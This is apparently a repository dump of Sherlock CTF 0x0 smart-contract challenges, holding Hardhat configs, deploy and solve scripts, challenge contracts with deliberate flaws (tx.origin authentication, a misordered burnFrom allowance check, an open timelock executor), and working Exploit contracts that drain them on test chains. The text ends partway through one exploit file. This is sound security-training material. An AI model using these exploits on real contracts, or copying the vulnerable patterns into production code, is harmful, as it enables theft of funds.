| "ethers": "^5.5.2", 18 | "hardhat": "^2.7.0", 19 | "ts-node": "^10.4.0", 20 | "typechain": "^6.0.5", 21 | "typescript": "^4.5.2", 22 | "@typechain/ethers-v5": "^8.0.5", 23 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 24 | "dotenv": "^14.3.2" 25 | }, 26 | "scripts": { 27 | "test-proxy": "hh test test/sherlock.test.ts" 28 | }, 29 | "files": [ 30 | "/contracts" 31 | ] 32 | } 33 | -------------------------------------------------------------------------------- /Thro77le/scripts/deploy.ts: -------------------------------------------------------------------------------- 1 | import hre from "hardhat"; 2 | import { ethers } from "hardhat"; 3 | 4 | function sleep(seconds: number) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | 11 | const setup = await SETUP.deploy(); 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt("Challenge", await setup.challenge()); 15 | 16 | console.log("Deployed setup to", setup.address); 17 | console.log("Deployed ctf to", ctf.address); 18 | 19 | // wait for etherscan to index 20 | await sleep(30); 21 | 22 | // verify 23 | await hre.run("verify:verify", { address: setup.address }); 24 | // await hre.run("verify:verify", { address: ctf.address }); 25 | } 26 | 27 | main() 28 | .then(() => process.exit(0)) 29 | .catch((error) => { 30 | console.error(error); 31 | process.exit(1); 32 | }); -------------------------------------------------------------------------------- /Thro77le/scripts/solve.ts: -------------------------------------------------------------------------------- 1 | // import ethers from "ethers"; 2 | 3 | // async function main() { 4 | // const SETUP = await ethers.getContractFactory("Setup"); 5 | // const EXPLOIT = await ethers.getContractFactory("Exploit"); 6 | 7 | // const setup = await SETUP.deploy({ value: ethers.utils.parseEther("1") }); 8 | // const ctf = await ethers.getContractAt( 9 | // "ExampleQuizExploit", 10 | // await setup.instance() 11 | // ); 12 | 13 | // console.log("solved:", await setup.isSolved()); 14 | 15 | // await EXPLOIT.deploy(ctf.address, { value: ethers.utils.parseEther("1") }); 16 | 17 | // console.log("solved:", await setup.isSolved()); 18 | // } 19 | 20 | // main() 21 | // .then(() => process.exit(0)) 22 | // .catch((error) => { 23 | // console.error(error); 24 | // process.exit(1); 25 | // }); -------------------------------------------------------------------------------- /Thro77le/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "target": "es2018", 4 | "module": "commonjs", 5 | "strict": true, 6 | "esModuleInterop": true, 7 | "outDir": "dist" 8 | }, 9 | "include": ["./scripts", "./test", "./types"], 10 | "files": ["./hardhat.config.ts"] 11 | } 12 | -------------------------------------------------------------------------------- /WRITEUPS.md: -------------------------------------------------------------------------------- 1 | # Write-ups and solutions 2 | 3 | - tqtsar writeup: https://tqts.ar/post/solving-sherlockctf 4 | - RomiRand solutions: https://github.com/RomiRand/sherlock_ctf_solutions 5 | - Thro77le solutions: https://github.com/Thro77le/Sherlock-CTF 6 | - naps62 solutions: https://github.com/naps62/care-x-sherlock-solutions 7 | - Baraa42 solutions: https://github.com/Baraa42/CTF-solution/tree/main/contracts 8 | - wuwe1 solutions: https://github.com/wuwe1/Sherlock-CTF 9 | - luksgrin solutions: https://github.com/luksgrin/Sherlock-CTF 10 | - t-nero solutions: https://github.com/t-nero/sherlock-ctf 11 | -------------------------------------------------------------------------------- /agusduha/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .env 3 | coverage 4 | coverage.json 5 | typechain 6 | 7 | #Hardhat files 8 | cache 9 | artifacts 10 | -------------------------------------------------------------------------------- /agusduha/README.md: -------------------------------------------------------------------------------- 1 | # sherlock-ctf-0x0-agusduha - The King Is Dead Long Live The King 2 | 3 | | Contract | Goerli | 4 | | -------------------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 5 | | CTF Proxy | [0x1020dFFD73141616fa7A931feE757DC9114B79D9](https://goerli.etherscan.io/address/0x1020dFFD73141616fa7A931feE757DC9114B79D9) | 6 | | TheKingIsDeadLongLiveTheKing.sol | [0x4B8df63820cD31D063a160e1C40f8583227591cB](https://goerli.etherscan.io/address/0x4B8df63820cD31D063a160e1C40f8583227591cB) | 7 | | Setup.sol | [0x459D9C80482c541deC1Aa491209EF598BF7c9344](https://goerli.etherscan.io/address/0x459D9C80482c541deC1Aa491209EF598BF7c9344) | 8 | 9 | ## Disclaimer 10 | 11 | The proxy contract is not verified (issues with hardhat-etherscan) but it is a ERC1967Proxy from openzeppelin deployed from Setup.sol (also verified). 12 | 13 | The implementation KingVault (TheKingIsDeadLongLiveTheKing.sol) is verified, you have to use the proxy address as if it is the implementation. 14 | 15 | The ether to be stolen is in the proxy contract. 16 | 17 | Sorry for the inconvenience! 18 | -------------------------------------------------------------------------------- /agusduha/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.4; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } 9 | -------------------------------------------------------------------------------- /agusduha/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.4; 3 | 4 | import "./ISetup.sol"; 5 | import "./TheKingIsDeadLongLiveTheKing.sol"; 6 | import "@openzeppelin/contracts/proxy/ERC1967/ERC1967Proxy.sol"; 7 | 8 | contract Setup is ISetup { 9 | ERC1967Proxy public instance; 10 | KingVault public kingVault; 11 | bytes public data; 12 | 13 | address constant admin = address(0xDA0); 14 | address constant proposer = address(0xDA2); 15 | address constant king = address(0x0); 16 | 17 | constructor() payable { 18 | require(msg.value == 0.2 ether); 19 | 20 | kingVault = new KingVault(); 21 | 22 | data = abi.encodeWithSelector( 23 | KingVault.initialize.selector, 24 | admin, 25 | proposer, 26 | king 27 | ); 28 | 29 | instance = new ERC1967Proxy{value: 0.2 ether}(address(kingVault), data); 30 | 31 | emit Deployed(address(instance)); 32 | } 33 | 34 | function isSolved() external view override returns (bool) { 35 | return address(instance).balance == 0; 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /agusduha/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require("dotenv").config(); 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 8 | 9 | // This is a sample Hardhat task. To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task("accounts", "Prints the list of accounts", async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners(); 13 | 14 | for (const account of accounts) { 15 | console.log(account.address); 16 | } 17 | }); 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: "0.8.4", 27 | etherscan: { 28 | // Your API key for Etherscan 29 | // Obtain one at https://etherscan.io/ 30 | apiKey: ETHERSCAN_API, 31 | }, 32 | networks: { 33 | goerli: { 34 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 35 | gasPrice: 900000000000, 36 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 37 | }, 38 | }, 39 | }; 40 | -------------------------------------------------------------------------------- /agusduha/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "hardhat-project", 3 | "devDependencies": { 4 | "@nomiclabs/hardhat-ethers": "^2.0.4", 5 | "@nomiclabs/hardhat-waffle": "^2.0.2", 6 | "chai": "^4.3.6", 7 | "ethereum-waffle": "^3.4.0", 8 | "ethers": "^5.5.3", 9 | "hardhat": "^2.8.3" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 13 | "@openzeppelin/contracts": "4.3.2", 14 | "@openzeppelin/contracts-upgradeable": "4.3.2", 15 | "dotenv": "^14.3.2" 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /agusduha/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | 11 | const setup = await SETUP.deploy({ value: parseEther("0.2") }); 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt("KingVault", await setup.instance()); 15 | 16 | const kingVault = await setup.kingVault(); 17 | const setupData = await setup.data(); 18 | 19 | console.log("Deployed setup to", setup.address); 20 | console.log("Deployed ctf proxy to", ctf.address); 21 | console.log("Deployed ctf implementation to", kingVault); 22 | 23 | // wait for etherscan to index 24 | await sleep(300); 25 | 26 | console.log("Verifying..."); 27 | 28 | // verify 29 | await hre.run("verify:verify", { 30 | address: setup.address, 31 | }); 32 | await hre.run("verify:verify", { 33 | address: kingVault, 34 | }); 35 | await hre.run("verify:verify", { 36 | address: ctf.address, 37 | constructorArguments: [kingVault, setupData], 38 | }); 39 | } 40 | 41 | main() 42 | .then(() => process.exit(0)) 43 | .catch((error) => { 44 | console.error(error); 45 | process.exit(1); 46 | }); 47 | -------------------------------------------------------------------------------- /agusduha/scripts/solving.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | 3 | async function main() { 4 | const SETUP = await ethers.getContractFactory("Setup"); 5 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 6 | 7 | const setup = await SETUP.deploy({ value: parseEther("0.2") }); 8 | const ctf = await ethers.getContractAt("KingVault", await setup.instance()); 9 | 10 | console.log("solved:", await setup.isSolved()); 11 | 12 | const exploit = await EXPLOIT.deploy(ctf.address); 13 | 14 | await exploit.finalize(); 15 | 16 | console.log("solved:", await setup.isSolved()); 17 | } 18 | 19 | main() 20 | .then(() => process.exit(0)) 21 | .catch((error) => { 22 | console.error(error); 23 | process.exit(1); 24 | }); 25 | -------------------------------------------------------------------------------- /bahurum/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .env 3 | coverage 4 | coverage.json 5 | typechain 6 | bin 7 | .vscode 8 | 9 | #Hardhat files 10 | cache 11 | artifacts 12 | -------------------------------------------------------------------------------- /bahurum/README.md: -------------------------------------------------------------------------------- 1 | # Inflation CTF submission 2 | 3 | | Contract | Goerli | 4 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 5 | | Inflation.sol | [0x68C3CA33c766cd60E4Af98D697EBd541B4DA7968](https://goerli.etherscan.io/address/0x68c3ca33c766cd60e4af98d697ebd541b4da7968) | 6 | | Setup.sol | [0xABF1f66a9fb48F3f5b75C8A83FB5854A9d906343](https://goerli.etherscan.io/address/0xabf1f66a9fb48f3f5b75c8a83fb5854a9d906343) | 7 | 8 | `.env` file 9 | 10 | ``` 11 | ETHERSCAN_API= 12 | ALCHEMY_API_KEY_GOERLI= 13 | PRIVATE_KEY= 14 | ``` 15 | -------------------------------------------------------------------------------- /bahurum/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './Inflation.sol'; 4 | 5 | contract Exploit { 6 | 7 | Inflation public instance; 8 | InflationaryToken public token; 9 | uint private tokensToBurn; 10 | 11 | constructor(Inflation _instance) { 12 | instance = _instance; 13 | token = InflationaryToken(instance.tokenAddress()); 14 | } 15 | 16 | function finalize() public { 17 | // Since the argument order of _spendAllowance in burnFrom is incorrect 18 | // we can approve an allowance to the challenge contract and then burn 19 | // this allowance from the challenge contract balance. 20 | // 10 % of tokens ar minted at each transfer, so we must take it into account 21 | tokensToBurn = token.totalSupply() * (100 + token.rate()) / 100; 22 | token.approve(address(instance), tokensToBurn); 23 | token.burnFrom(address(instance), tokensToBurn); 24 | } 25 | } -------------------------------------------------------------------------------- /bahurum/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | interface ISetup { 4 | event Deployed(address instance); 5 | 6 | function isSolved() external view returns (bool); 7 | } 8 | -------------------------------------------------------------------------------- /bahurum/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './ISetup.sol'; 4 | import './Inflation.sol'; 5 | 6 | contract Setup is ISetup { 7 | 8 | Inflation public instance; 9 | uint public constant inflationRate = 10; 10 | uint public constant initialSupply = 1000; 11 | 12 | constructor() { 13 | instance = new Inflation(inflationRate, initialSupply); 14 | emit Deployed(address(instance)); 15 | } 16 | 17 | function isSolved() external override view returns (bool) { 18 | return instance.isEmpty(); 19 | } 20 | } -------------------------------------------------------------------------------- /bahurum/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require("dotenv").config(); 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 8 | 9 | // This is a sample Hardhat task. To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task("accounts", "Prints the list of accounts", async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners(); 13 | 14 | for (const account of accounts) { 15 | console.log(account.address); 16 | } 17 | }); 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: "0.8.4", 27 | etherscan: { 28 | // Your API key for Etherscan 29 | // Obtain one at https://etherscan.io/ 30 | apiKey: ETHERSCAN_API, 31 | }, 32 | networks: { 33 | goerli: { 34 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 35 | gasPrice: 200000000000, 36 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 37 | }, 38 | }, 39 | }; 40 | -------------------------------------------------------------------------------- /bahurum/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "hardhat-project", 3 | "devDependencies": { 4 | "@nomiclabs/hardhat-ethers": "^2.0.4", 5 | "@nomiclabs/hardhat-waffle": "^2.0.2", 6 | "chai": "^4.3.6", 7 | "ethereum-waffle": "^3.4.0", 8 | "ethers": "^5.5.3", 9 | "hardhat": "^2.8.3" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 13 | "@openzeppelin/contracts": "^4.5.0", 14 | "dotenv": "^14.3.2" 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /bahurum/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | 11 | const setup = await SETUP.deploy(); 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt( 15 | "Inflation", 16 | await setup.instance() 17 | ); 18 | 19 | console.log("Deployed setup to", setup.address); 20 | console.log("Deployed ctf to", ctf.address); 21 | 22 | // wait for etherscan to index 23 | await sleep(300); 24 | 25 | // verify 26 | await hre.run("verify:verify", { 27 | address: setup.address, 28 | }); 29 | await hre.run("verify:verify", { 30 | address: ctf.address, 31 | constructorArguments: [ 32 | await setup.inflationRate(), 33 | await setup.initialSupply() 34 | ] 35 | }); 36 | } 37 | 38 | main() 39 | .then(() => process.exit(0)) 40 | .catch((error) => { 41 | console.error(error); 42 | process.exit(1); 43 | }); 44 | -------------------------------------------------------------------------------- /bahurum/scripts/solving.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | 3 | async function main() { 4 | const SETUP = await ethers.getContractFactory("Setup"); 5 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 6 | 7 | const setup = await SETUP.deploy(); 8 | const ctf = await ethers.getContractAt( 9 | "Inflation", 10 | await setup.instance() 11 | ); 12 | 13 | console.log("solved:", await setup.isSolved()); 14 | 15 | const exploit_instance = await EXPLOIT.deploy(ctf.address); 16 | await exploit_instance.finalize(); 17 | 18 | console.log("solved:", await setup.isSolved()); 19 | } 20 | 21 | main() 22 | .then(() => process.exit(0)) 23 | .catch((error) => { 24 | console.error(error); 25 | process.exit(1); 26 | }); 27 | -------------------------------------------------------------------------------- /band0x/BecomeMaster.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | 3 | const main = async () => { 4 | 5 | const setupFactory = await hre.ethers.getContractFactory("Setup"); 6 | const setupContract = await setupFactory.deploy({ value: parseEther("0.001") }); 7 | await setupContract.deployed(); 8 | console.log("Setup addy:", setupContract.address); 9 | console.log("Challenge Instance,", await setupContract.instance()); 10 | 11 | 12 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 13 | 14 | const ctf = await ethers.getContractAt( 15 | "Exploit", 16 | await setupContract.instance() 17 | ); 18 | 19 | console.log("solved:", await setupContract.isSolved()); 20 | 21 | await EXPLOIT.deploy(ctf.address, { value: parseEther("0.001") }); 22 | 23 | console.log("solved:", await setupContract.isSolved()); 24 | 25 | 26 | }; 27 | 28 | 29 | 30 | const runMain = async () => { 31 | try { 32 | await main(); 33 | process.exit(0); 34 | } catch (error) { 35 | console.log(error); 36 | process.exit(1); 37 | } 38 | }; 39 | 40 | runMain(); 41 | -------------------------------------------------------------------------------- /band0x/BecomeMaster.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.11; 3 | 4 | contract BecomeMaster { 5 | 6 | mapping (address => uint) allocations; 7 | address public admin; 8 | address public master; 9 | address caller; 10 | 11 | constructor() payable { 12 | master = msg.sender; 13 | } 14 | 15 | modifier onlyMaster { 16 | require( 17 | master == tx.origin, 18 | "caller is not the master" 19 | ); 20 | _; 21 | } 22 | modifier onlyContract { 23 | require( 24 | msg.sender != tx.origin, 25 | "caller is not the master" 26 | ); 27 | _; 28 | } 29 | modifier onlyAdmin { 30 | require( 31 | admin == tx.origin, 32 | "caller is not the Admin" 33 | ); 34 | _; 35 | } 36 | 37 | function allocate() public payable { 38 | allocations[caller] = allocations[caller] += (msg.value); 39 | admin = tx.origin; 40 | } 41 | 42 | function sendAllocation(address payable allocator) public { 43 | require(allocations[allocator] > 0); 44 | allocator.transfer(allocations[allocator]); 45 | } 46 | 47 | 48 | function takeMasterRole() public onlyAdmin onlyContract 49 | { 50 | master = admin; 51 | } 52 | 53 | function collectAllocations() public onlyMaster onlyContract { 54 | payable(msg.sender).transfer(address(this).balance); 55 | } 56 | 57 | function allocatorBalance(address allocator) public view returns (uint) { 58 | return allocations[allocator]; 59 | } 60 | 61 | } 62 | -------------------------------------------------------------------------------- /band0x/Exploit.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.11; 3 | 4 | import './BecomeMaster.sol'; 5 | 6 | contract Exploit { 7 | constructor(BecomeMaster instance) payable { 8 | require(msg.value == 0.001 ether); 9 | instance.allocate{value: 0.001 ether}(); 10 | instance.takeMasterRole(); 11 | instance.collectAllocations(); 12 | } 13 | 14 | function finalize() external { 15 | // can be used to finalize the exploit patten 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /band0x/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.11; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } 9 | -------------------------------------------------------------------------------- /band0x/README.md: -------------------------------------------------------------------------------- 1 | # sherlock-ctf-0x0-band0x 2 | CTF of band0x 3 | 4 | # The key to passing this test is in becoming a master. Can you become a master and drain the funds? 5 | 6 | GOERLI LINKS: 7 | 8 | [Setup.sol](https://goerli.etherscan.io/address/0x46C9489797c5647F850dD3A5bcB13C240bcd383A) 9 | [BecomeMaster.sol](https://goerli.etherscan.io/address/0xD2034a50C5Adc8A190D4f8c8EE18643Ab8A0ff05) 10 | 11 | Note ** Hardhat js file for deployment in repo. Same script also deploys and solves with Exploit.sol, not sure if required or not. 12 | -------------------------------------------------------------------------------- /band0x/Setup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.11; 3 | import './ISetup.sol'; 4 | import './BecomeMaster.sol'; 5 | 6 | contract Setup is ISetup { 7 | BecomeMaster public instance; 8 | address ORIGINAL_MASTER; 9 | 10 | constructor() payable { 11 | require(msg.value == 0.001 ether); 12 | instance = new BecomeMaster{value: 0.001 ether}(); 13 | emit Deployed(address(instance)); 14 | ORIGINAL_MASTER = instance.master(); 15 | instance.allocate(); 16 | } 17 | 18 | function isSolved() external override view returns (bool) { 19 | return instance.master() != ORIGINAL_MASTER && address(instance).balance == 0; 20 | 21 | } 22 | 23 | } 24 | -------------------------------------------------------------------------------- /chaboo/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .env 3 | coverage 4 | coverage.json 5 | typechain 6 | 7 | #Hardhat files 8 | cache 9 | artifacts 10 | -------------------------------------------------------------------------------- /chaboo/README.md: -------------------------------------------------------------------------------- 1 | # SwissTreasury CTF submission 2 | 3 | Your goal is to extract funds deposited within SwissTreasury contract. Nothing is secure even when it seems so. 4 | 5 | | Contract | Goerli | 6 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 7 | | SwissTreasury.sol | [0x014D1921A1237b6e8fF3FA960333329667F7e242](https://goerli.etherscan.io/address/0x014D1921A1237b6e8fF3FA960333329667F7e242) | 8 | | Setup.sol | [0x0a73CA730FaF56126487196a4B7E10B2A9B3df67](https://goerli.etherscan.io/address/0x0a73CA730FaF56126487196a4B7E10B2A9B3df67) | 9 | 10 | ## Local setup requires 11 | 12 | `.env` file 13 | 14 | ``` 15 | ETHERSCAN_API= 16 | ALCHEMY_API_KEY_GOERLI= 17 | PRIVATE_KEY= 18 | ``` 19 | -------------------------------------------------------------------------------- /chaboo/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.4; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } 9 | -------------------------------------------------------------------------------- /chaboo/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.4; 3 | 4 | import './ISetup.sol'; 5 | import './SwissTreasury.sol'; 6 | 7 | contract Setup is ISetup { 8 | SwissTreasury public instance; 9 | 10 | constructor() payable { 11 | require(msg.value == 1 ether); 12 | 13 | address[] memory proposers = new address[](0); 14 | address[] memory executors = new address[](1); 15 | executors[0] = address(0); 16 | 17 | instance = new SwissTreasury{value: 1 ether}(1 days, proposers, executors); 18 | 19 | emit Deployed(address(instance)); 20 | } 21 | 22 | function isSolved() external override view returns (bool) { 23 | return address(instance).balance == 0; 24 | } 25 | } -------------------------------------------------------------------------------- /chaboo/contracts/SwissTreasury.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.4; 3 | 4 | import "@openzeppelin/contracts/governance/TimelockController.sol"; 5 | 6 | contract SwissTreasury is TimelockController { 7 | 8 | event DistributeFundsExecuted(address indexed target, uint256 value); 9 | 10 | constructor(uint256 minDelay, address[] memory proposers, address[] memory executors) 11 | payable 12 | TimelockController(minDelay, proposers, executors) 13 | {} 14 | 15 | function distributeFunds(address target, uint256 value) external { 16 | require(msg.sender == address(this), "caller must be treasury"); 17 | 18 | (bool success, ) = target.call{value: value}(""); 19 | require(success, "Treasury: distribute failed"); 20 | 21 | emit DistributeFundsExecuted(target, value); 22 | } 23 | } -------------------------------------------------------------------------------- /chaboo/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "hardhat-project", 3 | "devDependencies": { 4 | "@nomiclabs/hardhat-ethers": "^2.0.4", 5 | "@nomiclabs/hardhat-waffle": "^2.0.2", 6 | "chai": "^4.3.6", 7 | "ethereum-waffle": "^3.4.0", 8 | "ethers": "^5.5.3", 9 | "hardhat": "^2.8.3" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 13 | "@openzeppelin/contracts": "4.3.0", 14 | "dotenv": "^14.3.2" 15 | }, 16 | "scripts": { 17 | "chain": "hardhat node --network hardhat", 18 | "compile": "hardhat compile", 19 | "test": "hardhat test --network hardhat", 20 | "accounts": "hardhat accounts", 21 | "balance": "hardhat balance", 22 | "deploy-locally": "node scripts/hardhat/deploy.js", 23 | "deploy-goerly": "node scripts/goerly/deploy.js" 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /chaboo/scripts/goerli/arguments.js: -------------------------------------------------------------------------------- 1 | module.exports = [ 2 | 86400, 3 | [], 4 | ["0x0000000000000000000000000000000000000000"] 5 | ]; 6 | 7 | // npx hardhat verify --constructor-args scripts/goerli/arguments.js 0x014D1921A1237b6e8fF3FA960333329667F7e242 8 | -------------------------------------------------------------------------------- /chaboo/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | 11 | const setup = await SETUP.deploy({ value: parseEther("1") }); 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt("SwissTreasury", await setup.instance()); 15 | 16 | console.log("Deployed setup to", setup.address); 17 | console.log("Deployed ctf to", ctf.address); 18 | 19 | // wait for etherscan to index 20 | await sleep(300); 21 | 22 | // verify 23 | await hre.run("verify:verify", { 24 | address: setup.address, 25 | }); 26 | await hre.run("verify:verify", { 27 | address: ctf.address, 28 | }); 29 | } 30 | 31 | main() 32 | .then(() => process.exit(0)) 33 | .catch((error) => { 34 | console.error(error); 35 | process.exit(1); 36 | }); 37 | -------------------------------------------------------------------------------- /chaboo/scripts/goerli/verify.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const setup = await ethers.getContractAt("Setup", "0x0a73CA730FaF56126487196a4B7E10B2A9B3df67"); 10 | const ctf = await ethers.getContractAt("SwissTreasury", "0x014D1921A1237b6e8fF3FA960333329667F7e242"); 11 | 12 | console.log("Deployed setup to", setup.address); 13 | console.log("Deployed ctf to", ctf.address); 14 | 15 | // verify 16 | await hre.run("verify:verify", { 17 | address: ctf.address, 18 | }); 19 | await hre.run("verify:verify", { 20 | address: setup.address, 21 | }); 22 | 23 | } 24 | 25 | main() 26 | .then(() => process.exit(0)) 27 | .catch((error) => { 28 | console.error(error); 29 | process.exit(1); 30 | }); 31 | -------------------------------------------------------------------------------- /chaboo/scripts/hardhat/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | // const hre = require("hardhat"); 3 | 4 | // function sleep(seconds) { 5 | // return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | // } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | 11 | const setup = await SETUP.deploy({ value: parseEther("1") }); 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt("SwissTreasury", await setup.instance()); 15 | 16 | console.log("Deployed setup to", setup.address); 17 | console.log("Deployed ctf to", ctf.address); 18 | 19 | // wait for etherscan to index 20 | // await sleep(300); 21 | 22 | // verify 23 | // await hre.run("verify:verify", { 24 | // address: setup.address, 25 | // }); 26 | // await hre.run("verify:verify", { 27 | // address: ctf.address, 28 | // }); 29 | } 30 | 31 | main() 32 | .then(() => process.exit(0)) 33 | .catch((error) => { 34 | console.error(error); 35 | process.exit(1); 36 | }); 37 | -------------------------------------------------------------------------------- /chaboo/scripts/solving.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | 3 | async function main() { 4 | const SETUP = await ethers.getContractFactory("Setup"); 5 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 6 | const setup = await SETUP.deploy({ value: parseEther("1") }); 7 | const ctf = await ethers.getContractAt("SwissTreasury", await setup.instance()); 8 | 9 | console.log("solved:", await setup.isSolved()); 10 | const exploit = await EXPLOIT.deploy(ctf.address); 11 | await exploit.finalize(); 12 | console.log("solved:", await setup.isSolved()); 13 | } 14 | 15 | main() 16 | .then(() => process.exit(0)) 17 | .catch((error) => { 18 | console.error(error); 19 | process.exit(1); 20 | }); 21 | -------------------------------------------------------------------------------- /ebaizel/.gitignore: -------------------------------------------------------------------------------- 1 | ETHERSCAN_API= 2 | ALCHEMY_API_KEY_GOERLI= 3 | PRIVATE_KEY= -------------------------------------------------------------------------------- /ebaizel/README.md: -------------------------------------------------------------------------------- 1 | # sherlock-ctf-0x0-ebaizel 2 | 3 | Goerli contract addresses: 4 | 5 | Setup 0x5364b5a9e489b495caae4722e9706c817cf54433 6 | PixelPavel 0x784b7a7a25ed38ef830aefe7985c64f3adf08346 -------------------------------------------------------------------------------- /ebaizel/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.7.6; 2 | 3 | 